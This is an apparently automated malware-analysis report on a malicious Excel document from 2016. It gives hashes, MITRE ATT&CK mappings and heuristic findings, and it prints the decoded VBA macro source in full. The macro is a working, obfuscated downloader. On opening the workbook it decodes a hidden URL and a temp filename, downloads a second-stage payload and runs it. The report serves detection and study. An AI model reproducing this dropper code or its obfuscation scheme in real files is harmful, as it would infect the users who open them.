Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2293fd013409e473…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 34.5 KB
Created: 2016-01-04 09:07:37
Authoring application: Microsoft Excel
First seen: 2016-03-19
MD5: 8f2edd9cb98ad1f87cd3f219cc02bc30
SHA-1: 22959accce48a506702c0cc04ef2206a35330e03
SHA-256: 2293fd013409e4739de1bf077034fa3f426ca00ebe405c9b8a7aa7ad209f1a1a
Risk score: 330

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is an Excel document containing VBA macros. The document body prompts the user to 'Enable This Content' and 'Enable Editing and Contents', a common social engineering lure for bypassing macro security. The VBA code uses `URLDownloadToFileA` and `WScript.Shell` to download and execute a second-stage payload, as indicated by the critical heuristics for these functions: `Workbook_Open` fires when the document is opened, passes obfuscated strings through a helper that subtracts a constant (13) from each character code to recover the download URL and a drop filename under `%TEMP%`, then calls the download routine and launches the dropped file via `WScript.Shell.Run`. The specific URL for the download is not fully extracted due to truncation, but the intent is clear.

Heuristics (9)

  • Reference to URLDownloadToFile API (critical) SC_STR_URLDOWNLOAD
  • VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage (critical) OLE_VBA_WSCRIPT
    Matched lines in script:
    Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
    Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
    IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
  • URLDownloadToFile in VBA (critical) OLE_VBA_DOWNLOAD
    Matched lines in script:
    #If Win64 Then
    Private Declare PtrSafe Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
    #Else
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Matched lines in script:
    Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
    Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
    IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro (low) OLE_VBA_WBOPEN
    Matched lines in script:
    End Sub
    Private Sub Workbook_Open()
    DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV = 1
  • Reference to Windows Script Host (high) SC_STR_WSCRIPT
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4674 bytes
SHA-256: d6c1fb1ece204081839dc4dd8f1ed1d59982b3c71c36f822d0648f8e1ace2db5

Detection
  ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub GUvbsfln()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#Else
Private Declare Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#End If
Dim KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX, DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV, TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF, ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP
Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT 0&, KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX, IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV, 0&, 0&
XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.Run IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV
End Sub
Private Sub Workbook_Open()
DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV = 1

ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP = 13
KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX = XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK("u��}G<<„vyy€zn{�r{;| t;v{<zv{r : r€€€€;r…r")

TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF = XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK("iOVXYUbPe^UV`UW^\TZf;r…r")
XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY
End Sub
Private Function XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH)
For WHUXEJTBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJU = DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV To Len(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH)
XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG = Mid(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH, WHUXEJTBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJU, DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV)
XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG = Chr(Asc(XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG) - ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP)
ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG = ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG + XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG
Next
XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK = ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True